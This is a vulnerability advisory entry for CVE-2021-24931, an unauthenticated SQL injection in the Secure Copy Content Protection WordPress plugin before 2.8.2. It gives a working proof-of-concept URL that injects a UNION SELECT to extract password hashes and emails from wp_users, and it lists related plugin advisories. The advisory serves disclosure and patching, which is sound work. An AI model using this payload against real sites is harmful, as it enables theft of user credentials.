Secure Copy Content Protection and Content Locking < 2.8.2 – Unauthenticated SQL Injection | CVE 2021-24931 | Plugin Vulnerabilities

Description

The plugin does not escape the sccp_id parameter of the ays_sccp_results_export_file AJAX action (available to both unauthenticated and authenticated users) before using it in a SQL statement, leading to an SQL injection.

Proof of Concept

https://example.com/wp-admin/admin-ajax.php?action=ays_sccp_results_export_file&sccp_id[]=3)%20union%20select%201,user_pass,user_email,2,2,2%20from%20wp_users%20union%20select%201,1,1,1,1,1%20FROM%20wp_ays_sccp_reports%20WHERE%20(1=1%20&type=json

Affects Plugins

secure-copy-content-protection

Fixed in 2.8.2

References

CVE

Classification

Type

SQLI

OWASP top 10

CWE

CVSS

Miscellaneous

Original Researcher

Krzysztof Zając

Submitter

Krzysztof Zając

Submitter website

https://kazet.cc/

Verified

Yes

WPVDB ID

1cd52d61-af75-43ed-9b99-b46c471c4231

Timeline

Publicly Published

2021-11-08 (about 2 years ago)

Added

2021-11-08 (about 2 years ago)

Last Updated

2022-04-12 (about 2 years ago)

Other

Published

Title

Published

2024-03-28

Title

ProfileGrid < 5.7.9 - Unauthenticated SQL Injection

Published

2019-07-26

Title

Photo Gallery by 10Web <= 1.5.30 - SQL Injection

Published

2024-03-28

Title

Falang multilanguage < 1.3.48 - Authenticated (Administrator+) SQL Injection

Published

2023-02-27

Title

Paid Memberships Pro < 2.9.12 - Subscriber+ SQL Injection

Published

2022-01-24

Title

Database Backup for WordPress < 2.5.1 - Admin+ SQL Injection